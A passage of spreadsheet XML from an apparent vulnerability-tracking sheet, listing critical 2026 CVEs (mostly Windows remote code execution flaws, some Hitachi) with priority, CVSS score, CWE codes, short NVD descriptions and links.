        <v>9.800000000000001</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Direct Show allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69715</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69730</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69730</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69768</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69768</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69769</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69769</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69819</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in RPC Runtime allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69819</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69824</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69824</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69829</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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6" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Shell allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69829</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69845</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K47" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69845</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69910</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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8" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69910</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70296</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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9" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70296</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71374</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data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
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71374</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71376</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>OS command injection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
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71376</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71377</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>Command Argument Injection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through 11-00-12, from 09-87 before 09-87-10, from 09-80 through 09-80-04, from 09-70 before 09-70-28, from 09-50 through 09-50-22, and from 09-00 through 09-00-18.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71377</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72979</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K53" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72979</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72982</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Netlogon allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72982</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72983</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Internet Connection Sharing (ICS) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72983</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73009</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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6" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73009</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73010</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K57" s="5" t="inlineStr">
        <is>
